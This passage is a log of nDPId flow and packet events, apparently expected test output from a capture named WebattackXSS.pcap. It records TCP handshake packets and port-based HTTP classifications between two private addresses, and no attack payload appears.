-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5446,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":385,"flow_packet_id":3,"flow_last_seen":1499347618758,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347618758,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UcVAAD4GdBOsEAABwKgKMub0AFCevDJ6V6NptYAQAOXnBwAAAQEICgE7Y74D5TUy"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5462,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347621256,"flow_last_seen":1499347621256,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347621256,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59150,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5462,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":386,"flow_packet_id":1,"flow_last_seen":1499347621256,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347621256,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Hc9AAD4GqAGsEAABwKgKMucOAFD+NnvhAAAAAKACchCWIwAAAgQFtAQCCAoBO2YuAAAAAAEDAwc="} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":386,"flow_packet_id":2,"flow_last_seen":1499347621256,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347621256,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5w6DP0I9\/jZ74qAScSCV\/QAAAgQFtAQCCAoD5TejATtmLgEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5465,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":386,"flow_packet_id":3,"flow_last_seen":1499347621257,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347621257,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0HdBAAD4GqAisEAABwKgKMucOAFD+Nnvigz9CPoAQAOU1BQAAAQEICgE7Zi4D5Tej"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347622524,"flow_last_seen":1499347622524,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347622524,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59164,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5475,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":387,"flow_packet_id":1,"flow_last_seen":1499347622524,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347622524,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8QPZAAD4GhNqsEAABwKgKMuccAFAFlCedAAAAAKACchDhvwAAAgQFtAQCCAoBO2drAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5476,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":387,"flow_packet_id":2,"flow_last_seen":1499347622524,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347622524,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5xwFxGkkBZQnnqAScSA28QAAAgQFtAQCCAoD5TjgATtnawEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5477,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":387,"flow_packet_id":3,"flow_last_seen":1499347622525,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347622525,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0QPdAAD4GhOGsEAABwKgKMuccAFAFlCeeBcRpJYAQAOXV+AAAAQEICgE7Z2sD5Tjg"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5487,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347623786,"flow_last_seen":1499347623786,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347623786,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59178,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5487,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":388,"flow_packet_id":1,"flow_last_seen":1499347623786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347623786,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8EPlAAD4GtNesEAABwKgKMucqAFD89nheAAAAAKACchCYUQAAAgQFtAQCCAoBO2inAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5489,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":388,"flow_packet_id":2,"flow_last_seen":1499347623786,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347623786,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5yptg31h\/PZ4X6AScSBwSgAAAgQFtAQCCAoD5TocATtopwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5491,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":388,"flow_packet_id":3,"flow_last_seen":1499347623787,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347623787,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0EPpAAD4GtN6sEAABwKgKMucqAFD89nhfbYN9YoAQAOUPUgAAAQEICgE7aKcD5Toc"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5499,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347625094,"flow_last_seen":1499347625094,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347625094,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59192,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5499,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":389,"flow_packet_id":1,"flow_last_seen":1499347625094,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347625094,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8QvlAAD4GgtesEAABwKgKMuc4AFBpNSsUAAAAAKACchB4CQAAAgQFtAQCCAoBO2ntAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5500,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":389,"flow_packet_id":2,"flow_last_seen":1499347625094,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347625094,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5zhhGRuGaTUrFaAScSC9AAAAAgQFtAQCCAoD5TtjATtp7QEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5502,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":389,"flow_packet_id":3,"flow_last_seen":1499347625095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347625095,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0QvpAAD4Ggt6sEAABwKgKMuc4AFBpNSsVYRkbh4AQAOVcBwAAAQEICgE7ae4D5Ttj"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5510,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347626349,"flow_last_seen":1499347626349,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347626349,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59206,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5510,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":390,"flow_packet_id":1,"flow_last_seen":1499347626349,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347626349,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8CphAAD4GuzisEAABwKgKMudGAFA4VWG\/AAAAAKACchBw9gAAAgQFtAQCCAoBO2snAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5511,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":390,"flow_packet_id":2,"flow_last_seen":1499347626349,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347626349,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ50a6Rl2POFVhwKAScSAZfgAAAgQFtAQCCAoD5TycATtrJwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5513,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":390,"flow_packet_id":3,"flow_last_seen":1499347626351,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347626351,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0CplAAD4Guz+sEAABwKgKMudGAFA4VWHAukZdkIAQAOW4hAAAAQEICgE7aygD5Tyc"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5522,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347627616,"flow_last_seen":1499347627616,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627616,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59220,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5522,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":391,"flow_packet_id":1,"flow_last_seen":1499347627616,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347627616,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8GbxAAD4GrBSsEAABwKgKMudUAFBilXXYAAAAAKACchAxUgAAAgQFtAQCCAoBO2xkAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5523,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":391,"flow_packet_id":2,"flow_last_seen":1499347627616,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347627616,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ51QwQXQsYpV12aAScSBMBQAAAgQFtAQCCAoD5T3ZATtsZAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5524,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":391,"flow_packet_id":3,"flow_last_seen":1499347627617,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347627617,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Gb1AAD4GrBusEAABwKgKMudUAFBilXXZMEF0LYAQAOXrDAAAAQEICgE7bGQD5T3Z"} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347495714,"flow_last_seen":1499347500750,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57806,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347495714,"flow_last_seen":1499347500750,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57806,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347498249,"flow_last_seen":1499347503750,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57832,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347498249,"flow_last_seen":1499347503750,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57832,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347499500,"flow_last_seen":1499347504749,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57846,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347499500,"flow_last_seen":1499347504749,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57846,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347500770,"flow_last_seen":1499347506751,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57860,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347500770,"flow_last_seen":1499347506751,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57860,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347503273,"flow_last_seen":1499347508751,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57886,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347503273,"flow_last_seen":1499347508751,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57886,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347504529,"flow_last_seen":1499347509751,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57900,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347504529,"flow_last_seen":1499347509751,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347627790,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57900,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5543,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347630130,"flow_last_seen":1499347630130,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347630130,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59246,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5543,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":392,"flow_packet_id":1,"flow_last_seen":1499347630130,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347630130,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rFRAAD4GGXysEAABwKgKMuduAFDOysKMAAAAAKACchB12gAAAgQFtAQCCAoBO27YAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5545,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":392,"flow_packet_id":2,"flow_last_seen":1499347630130,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347630130,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ5252igpmzsrCjaAScSCxlQAAAgQFtAQCCAoD5UBOATtu2AEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5546,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":392,"flow_packet_id":3,"flow_last_seen":1499347630131,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347630131,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rFVAAD4GGYOsEAABwKgKMuduAFDOysKNdooKZ4AQAOVQnAAAAQEICgE7btkD5UBO"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5555,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347631388,"flow_last_seen":1499347631388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347631388,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59260,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5555,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":393,"flow_packet_id":1,"flow_last_seen":1499347631388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347631388,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8+pxAAD4GyzOsEAABwKgKMud8AFDgpIqPAAAAAKACchCatAAAAgQFtAQCCAoBO3ATAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5556,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":393,"flow_packet_id":2,"flow_last_seen":1499347631388,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347631388,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ53x5W3jF4KSKkKAScSBkBQAAAgQFtAQCCAoD5UGIATtwEwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5558,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":393,"flow_packet_id":3,"flow_last_seen":1499347631389,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347631389,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0+p1AAD4GyzqsEAABwKgKMud8AFDgpIqQeVt4xoAQAOUDDQAAAQEICgE7cBMD5UGI"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5568,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347632635,"flow_last_seen":1499347632635,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347632635,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59274,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
